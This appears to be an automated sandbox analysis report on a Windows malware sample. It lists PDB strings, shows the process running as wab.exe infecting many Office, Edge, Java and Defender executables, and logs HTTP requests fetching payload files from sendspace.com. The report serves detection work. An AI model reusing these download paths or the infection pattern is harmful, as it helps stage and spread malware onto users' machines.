              Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*.* source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2409876793.00000000222C4000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdb source: notification_click_helper.exe.9.dr
              Source: Binary string: @winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdbOGP source: notification_click_helper.exe.9.dr
              Source: Binary string: )"WINLOA~1.PDBk,"$5,"$5," source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wab.pdbGCTL source: OfficeScrSanBroker.exe.9.dr, jucheck.exe.9.dr, officeappguardwin32.exe.9.dr, dbcicons.exe.9.dr, sscicons.exe.9.dr, notification_click_helper.exe.9.dr, accicons.exe.9.dr
              Source: Binary string: wab.pdb source: OfficeScrSanBroker.exe.9.dr, jucheck.exe.9.dr, officeappguardwin32.exe.9.dr, dbcicons.exe.9.dr, sscicons.exe.9.dr, notification_click_helper.exe.9.dr, accicons.exe.9.dr
              Source: Binary string: in32.pdb source: officeappguardwin32.exe.9.dr
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2402584546.0000000003515000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\officescrsanbroker.pdbbroker.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: OfficeScrSanBroker.exe.9.dr
              Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\* source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2409876793.00000000222C4000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\officescrsanbroker.pdb source: OfficeScrSanBroker.exe.9.dr
              Source: Binary string: ,"4winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\officeappguardwin32.pdbin32.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: officeappguardwin32.exe.9.dr
              Source: Binary string: LC:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: broker.pdb source: OfficeScrSanBroker.exe.9.dr
              Source: Binary string: @winload_prod.pdbf,"@ source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: )"WINLOA~1.PDB source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp

              Spreading

              barindex
              Infects executable files (exe, dll, sys, html)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXEJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: Joe Sandbox ViewIP Address: 69.31.136.17 69.31.136.17
              Source: Joe Sandbox ViewIP Address: 104.21.28.80 104.21.28.80
              Source: Joe Sandbox ViewIP Address: 69.31.136.57 69.31.136.57
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /pro/dl/i41a76 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /dlpro/81d69660376a5bce96e9e379357cd531/664f8719/i41a76/Semicylinder.psm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs03n4.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /pro/dl/12acii HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dlpro/a249fc130e1351275114f8d6a64c794e/664f873c/12acii/aLnQbzJIDX45.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs13n1.sendspace.comConnection: Keep-AliveCookie: SID=3n1k50ohec2v6n8nvd1o04nn84
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /pro/dl/i41a76 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /dlpro/81d69660376a5bce96e9e379357cd531/664f8719/i41a76/Semicylinder.psm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs03n4.sendspace.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /pro/dl/12acii HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /dlpro/a249fc130e1351275114f8d6a64c794e/664f873c/12acii/aLnQbzJIDX45.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs13n1.sendspace.comConnection: Keep-AliveCookie: SID=3n1k50ohec2v6n8nvd1o04nn84
              Source: global trafficDNS traffic detected: DNS query: www.sendspace.com
              Source: global trafficDNS traffic detected: DNS query: fs03n4.sendspace.com
              Source: global trafficDNS traffic detected: DNS query: fs13n1.sendspace.com
              Source: OfficeScrSanBroker.exe.9.drString found in binary or memory: http://SoftwareMicrosoft16.0CommonDebugHKEY_LOCAL_MACHINEHKEY_CURRENT_USER
